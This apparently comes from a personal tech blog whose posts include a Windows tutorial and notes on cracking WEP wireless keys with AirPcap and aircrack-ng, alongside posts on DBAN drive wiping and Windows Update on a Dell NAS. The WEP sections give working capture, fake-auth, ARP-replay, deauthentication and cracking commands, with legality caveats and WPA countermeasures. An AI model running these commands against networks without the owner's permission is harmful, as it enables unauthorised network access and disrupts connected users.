Mind Circus

I just discovered that the NSA publish a fair amount of Security guides on their website. Looks like some very interesting content – not to mention free

Found via Network Geek (which I found via Ma.tt)

Finally, I’ve had time to write down my notes on using aircrack-ng with the Airpcap Tx adapter in Windows. Before you read on, please be aware that this isn’t meant to be a guide or tutorial, it’s just my notes. Thanky

Basics

Start capturing:

airodump-ng \\.\airpcap00 airpcap CHANNELNUMBER mycapturefile

Fake auth:

aireplay-ng --fakeauth 0 -e "MYSSID" -a BSSIDMAC -h AIRPCAPMAC \\.\airpcap00

Start attack:

aireplay-ng --arpreplay -b BSSIDMAC -h CLIENTMAC \\.\airpcap00

Deauth (if we need ARPs):

aireplay-ng –deauth 3 -a BSSIDMAC -c CLIENTMAC \\.\airpcap00

Start cracking:

aircrack-ng -z mycapturefile.cap

Worked example:

airodump-ng.exe \\.\airpcap00 airpcap 11 mycapturefile
aireplay-ng --fakeauth 0 -e "WEP" -a 00:a0:c5:9d:d5:50 -h 00:02:72:67:92:8a \\.\airpcap00
aireplay-ng --arpreplay -b 00:a0:c5:9d:d5:50 -h 00:90:4b:eb:9b:36 \\.\airpcap00
aireplay-ng --deauth 3 -a 00:a0:c5:9d:d5:50 -c 00:90:4b:eb:9b:36 \\.\airpcap00
aircrack-ng -z mycapturefile.cap

Download

I’ve prepared a special release of the aircrack-ng tools originally prepared by CACE Technologies on the AirPcap CDROM. It replaces the new aireplay-ng.exe with an older one which, in my tests, appears to perform better.

Download the release of aircrack-ng for AirPcap Tx

Every once in a while I need to securely wipe a hard drive before it’s sold on. To do this I use Darik’s Boot and Nuke. DBAN is a free, bootable application that allows you to securely erase a hard drive so that no one can recover any of the data that’s on it.

Why should you use DBAN?

If you’re selling your hard drive on eBay, or anywhere else, it’s vital that the data is completely erased as many buyers are scouring for personal data left on hard drives. A format using fdisk is not enough, as a standard format only marks the data as erased – it’s still there, it’s just been hidden from view; and by using readily available tools, it’s incredibly easy to un-hide that data and do whatever you want with it. Securely erasing data is especially important if your decommissioned hard drive has any sensitive data on it – and it’s safe to say that if you care about your privacy, or you’re running a business, most data is sensitive!

Using DBAN

You can boot DBAN from a CD/DVD or a USB drive. Once it’s booted, simply choose a wipe method, and how many rounds of wiping you’d like to perform. From my research online, I’ve found that using a PRNG (Pseudo-Random Number Generation) wipe 8 times over, is the most secure for modern hard drives. Apparently the Guttman (35 round wipe) isn’t as effective on modern drives.

Here’s the basic steps you need:

• Burn the .iso file to a CD (you can use something like ImgBurn)
• Boot up DBAN, and hit Enter to run in Interactive Mode.
• Press the M Key to choose the Method: Scroll down to PRNG and hit Space.
• Press the R Key to choose the Rounds: For high security we need 8 rounds, so replace 1 with 8.
• Hit F10 to start, and wait until done.

After re-installing the OS on a Dell Powervault 715n, I remembered that out of the box, it won’t connect to Windows Update (which is of course really, really stupid for a Windows 2000 Server based NAS).

If you RDC into the box, and then try to connect to Windows Update, you’ll see a message like this:

Access Denied

Network policy settings prevent you from using Windows Update to download and install updates on your computer.

If you believe you have received this message in error, please check with your system administrator.

Solution

To get around this on the 715N, follow these instructions:

1. Log in as Administrator
2. Go Start > Run… > gpedit.msc
3. In the Left pane: Open User Configuration, Administrative Templates, and then click Start Menu and Taskbar
4. In the Right pane: Double-click on Disable and remove links to Windows Update
5. Choose ‘Disable’ and click OK
6. You can now get Windows Updates via the Start Menu
7. Don’t forget to Enable Automatic Updates! (Control Panel > Automatic Updates)

For any other Operating System, have a look at the Microsoft KB article

Primer

Recently a team of German cryptography researchers perfected methods to recover a WEP key faster than ever before. The older Weak IV attacks generally needed between 500,000 and 2,000,000 packets to recover a 128-bit WEP key. In contrast, the new PTW method needs a mere 85,000 packets to have a 95% chance of recovering the WEP key.

Unlike the Weak IV attack, instead of collecting weak IVs, the PTW method collects ARP requests and responses to attack the encryption. ARP requests can either be collected naturally, or can be generated via packet injection. Until recently, packet injection was only possible in Linux. With the advent of the AirPcap USB adapter, and some unsupported beta drivers, it’s possible to inject packets in Windows. Update: CACE have released AirPcap Tx, which features fully supported packet injection, for an added premium.

In this tutorial, I’ll guide you through the process of recovering a WEP key, via the PTW attack, in Windows. For this you’ll be using the AirPcap USB adapter, Cain, aircrack-ptw, and the aircrack-ng suite.

Legalities

It’s important to point out that these methods should only be applied with permission from the owner of the target AP. You should either be auditing, penetration testing, or demonstrating the weaknesses of WEP in a Test Lab environment. You should not be using these methods to get “Free internet”!

Preparation

You’ll need:

• An AP configured with WEP
• At least one client associated with the Access Point (to give us an initial ARP request)
• A standard AirPcap Adapter with the unsupported beta packet injection driver or a fully-supported AirPcap Tx.
• Cain and Abel
• aircrack-ng for AirPcap
• aircrack-ptw for Windows

Now you’ll need to prepare the environment:

• Install the beta drivers (or if you have AirPcap Tx, install the drivers from the CD-ROM)
• Plug in the AirPcap
• Install Cain
• Extract aircrack-ng to c:\airpcap\
• Extract aircrack-ptw to c:\airpcap\
• Move aircrack-ptw.exe to the bin folder (this is no longer required – see my notes)
• Optional: To make things easier, move the contents of the bin folder to c:\airpcap\. You’ll then be able to run aircrack-ptw.exe with just c:\airpcap\aircrack-ptw.exe mycapture.cap

Let’s get cracking

I added narration to the video this evening at 20:36. It’s my first attempt at narration, and a little noisy, but I’m sure things will improve as time goes on!

Youtube Video Link

Countermeasures

The primary counter measure to this WEP attack is to cease using WEP and switch your Access Points to WPA encryption. As you’ve seen in this video, WEP is just too easy to crack. For further reading, Wikipedia has an excellent entry on WPA.

Access Points are so cheap now that, if your AP doesn’t support WPA via a firmware upgrade, you can easily afford a new one with full WPA or WPA2 support.

Notes

Note 1: After recording this tutorial, I’ve become aware that, as of version 0.9, aircrack-ng.exe natively supports the PTW attack by using the -z switch. For example: aircrack-ng.exe -z mycapturefile.cap. If you want to use this attack, download aircrack-ng from the authors, and replace aircrack-ng.exe in c:\airpcap with the new one.

Note 2: The whole process from starting capture to recovering the WEP key takes about 10 minutes.

Note 3: It is important that you get the Packet Injection drivers and the aircrack-ng release specifically for the AirPcap adapter, or this will not work.

Note 4: Just to summarise the steps in the video:

1. Run Cain and passively scan for the target AP, making a note of the Channel number.
2. Using the channel number, tell AirPcap to inject packets once it has collected an ARP request. (You can sometimes force an ARP by sending Deauth. To do that, right click on the client. Otherwise, repair the Wireless connection on the client connected to the AP)
3. To use the PTW attack, you need to collect all packets. By running airodump-ng you can collect all the packets generated by Cain. The reason we use airodump-ng instead of Cain, is that Cain only collects WEP IVs.
4. Once you’ve collected enough packets, run aircrack-ptw against the capture file.